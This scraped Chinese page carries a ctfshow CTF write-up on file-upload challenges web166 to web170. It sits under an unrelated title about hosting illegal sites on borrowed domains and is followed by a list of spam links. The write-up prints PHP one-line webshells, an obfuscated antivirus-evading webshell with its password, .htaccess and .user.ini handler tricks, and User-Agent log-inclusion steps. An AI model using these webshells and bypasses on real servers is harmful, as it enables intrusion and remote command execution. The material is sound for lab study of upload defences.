当前位置: 首页 > news >正文

用别人备案域名做违法网站集图网

用别人备案域名做违法网站,集图网,北京办公用品网站建设,正规电商平台有哪些目录 1、web166 2、web167 3、web168 4、web169 5、web170 1、web166 查看源码#xff0c;前端只让传 zip 上传 zip 成功后可以进行下载 随便搞一个压缩包#xff0c;使用记事本编辑#xff0c;在其内容里插入一句话木马#xff1a; 上传该压缩包#xff0c;上传成功…目录 1、web166 2、web167 3、web168 4、web169 5、web170 1、web166 查看源码前端只让传 zip 上传 zip 成功后可以进行下载  随便搞一个压缩包使用记事本编辑在其内容里插入一句话木马 上传该压缩包上传成功后点击下载文件使用 burpsuite 抓包 我这里木马内容用的 request 就在 get 里执行 ls 没什么问题但是读取 flag 时识别有点问题最好使用 post 请求因此将请求方法改为 post 将 file 的内容还原到上面。 读取 flag ctfshow{f98c6ba4-e71a-46bf-b7c3-846db8cc08d7} 后面发现转为 get 方法其实也是可以的注意添加一个加号进行拼接而不是用空格 2、web167 提示httpd .htaccess 文件是 Apache HTTP 服务器的目录级配置文件它允许用户覆盖 Web 服务器的系统范围设置而无需修改全局配置文件例如 httpd.conf 或 apache2.conf。 这里我们可以通过上传 .htaccess 文件其内容设置如下 FilesMatch .jpgSetHandler application/x-httpd-php /FilesMatch这里先改为 jpg 上传绕过前端限制后再改回 .htaccess 放包 这个配置文件上传成功后就会使 jpg 后缀的文件都被当做 php 文件解析。 接下来我们直接将一句话木马改为 jpg 后缀上传 点击下载文件即可访问到一句话木马 空白说明上传解析成功。 调用 看一下上层目录 读取 flag.php 拿到 flagctfshow{ba49b0f7-b8f9-447d-b1d3-118311c3d829} 3、web168 前端还是只能传 png 使用 burpsuite 抓包改后缀重放回显 null 什么都没有回显 做了一下 fuzz 测试 单个的字符都是没问题的但是合在一起传的内容就有问题并不是像前面对内容进行过滤那样简单查看提示基础免杀。 经过测试正常内容可以上传并且对 php 文件没有后缀限制 文件会被上传到 upload 目录下  phpinfo 也可以正常上传并解析  无论是正常的 php 代码还是短标签的格式 测试关键字eval、system、assert、$_POST 均返回 null猜测应该是过滤掉了一些危险函数和关键字 做了一下拼接绕过 ?php$ae.v;$ba.l;$c$a.$b;$c($_REQUEST[cmd]); ? 但是访问的时候报错 看来不光是过滤关键字这些高位函数在 PHP 配置中也被禁用了。 在网上找到了一个免杀的木马 ?php $bFIYcreate_function(chr(25380/705).chr(92115/801).base64_decode(bw).base64_decode(bQ).base64_decode(ZQ),chr(0x16964/0x394).chr(0x6f16/0xf1).base64_decode(YQ).base64_decode(bA).chr(060340/01154).chr(01041-0775).base64_decode(cw).str_rot13(b).chr(01504-01327).base64_decode(ZQ).chr(057176/01116).chr(0xe3b4/0x3dc));$bFIY(base64_decode(NjgxO.Tc7QG.V2QWw.oJF9Q..str_rot13(G).str_rot13(1).str_rot13(A).base64_decode(VQ).str_rot13(J)...chr(0x304-0x2d3).base64_decode(Ug).chr(13197/249).str_rot13(F).base64_decode(MQ)..B1bnR.VXSk7.MjA0N.TkxOw..));? 连接密码: TyKPuntU  调用 查看上一层目录 TyKPuntUsystem(ls ../); 存在 flag.php 和 flagaa.php先读取 flag.php TyKPuntUsystem(tac ../flag.php); 不是那么再读取 flagaa.php TyKPuntUsystem(tac ../flagaa.php); 拿到 flagctfshow{eec273d2-c16e-4772-bc11-b9d3587af55b}  如果这里不上一句话木马我们还可以使用反引号来执行命令 ?ls ..;读取 flag ?tac ../flagaa.php; 4、web169 高级免杀 前端只能传 zip抓包绕过即可  但是在后端上传发现不行这段 unicode 编码在前面遇到过文件类型没对。 需要修改 content-type 为image/png 至于文件后缀并不影响php 也可以 测一下上一题的木马过不了 这里直接把尖括号大于小于号都给毙掉了 想直接写进去很难了采用日志文件包含 先上传配置文件 .user.ini也需要改文件类型为 png 图片类型 可以上传成功再在  ua 头里面插入我们希望执行的 php代码再次发送  访问 upload 目录返回 403应该是 upload 目录下没有 php 文件 我们随便传一个上去 访问 /upload/1.php 遇到报错 可能前面传得太乱了重启容器重新传 php 文件和配置文件 再次访问 /upload/1.php可以看到 ls ../ 执行成功 读取 flag 拿到 flagctfshow{5e939b5c-d235-43ae-9b2b-22c0387a9278} 5、web170 终极免杀方法与上一题一样也是采用日志包含。 传配置文件 这里的 payload 就直接读 flag 了 传 php 文件 这次直接传 index.php内容为空一会儿直接访问 upload 目录即可看到回显。 拿到 flagctfshow{719e6a2b-7309-4fe1-964b-8ba79bcbb809} CTFshow-Web 入门系列的文件上传至此结束。 Myon2024.7.11
http://www.hkea.cn/news/14568970/

相关文章:

  • 网站建设合同 模板网络营销导向的企业网站建设的要求
  • 怎么给自己的网站做排名WordPress跨机房同步
  • 大连科技网站制作网站建设参考文献资料
  • 举措推进网站互动交流建设福州建设银行招聘网站
  • 广东网站se0优化公司网站 标题 字体
  • 制作网站找哪家好网站开发语言有php
  • 安阳同城网济南网站建设yigeseo
  • 龙武工会网站怎么做东营市
  • 网站开发需要什么文凭做一个自己的网站多少钱
  • 青岛做网站的 上市公司网络科技公司名称大全简单大气
  • 搜狗站长平台验证不了wordpress如何采集
  • 自助个人网站注册建网站报价表
  • 怎么计算网站开发费用江苏交通运输厅网站建设
  • 济南市历下区建设局官方网站要想浏览国外网站 应该怎么做
  • 电商网站开发公司杭州哪家建站公司好
  • 网站开发项目流程书做运营常用的网站
  • 铁道部建设监理协会网站最近最新手机中文大全10
  • 让别人做网站如何防止后门网页美工设计需要学什么
  • 2019建设摩托官方网站微网站 前景
  • 广州市网站建站商标注册网址
  • 做仿牌网站被封网站换空间 怎么下载
  • 宁波网站建设哪里便宜长春网站推广方式
  • 基于响应式设计的网站建设有ip怎么用自己的主机做网站
  • 网站广告图怎么做潘家园做网站公司
  • 免费手机网站开发网店网页制作
  • 自建门户网站网页设计与制作开发遇到的困难
  • 做新网站的swot分析外贸公司的网站建设
  • 网站建设德语随州王章欣
  • 用wordpress建立的网站全网推广图片
  • wordpress主题的网站昆明猫咪科技网站建设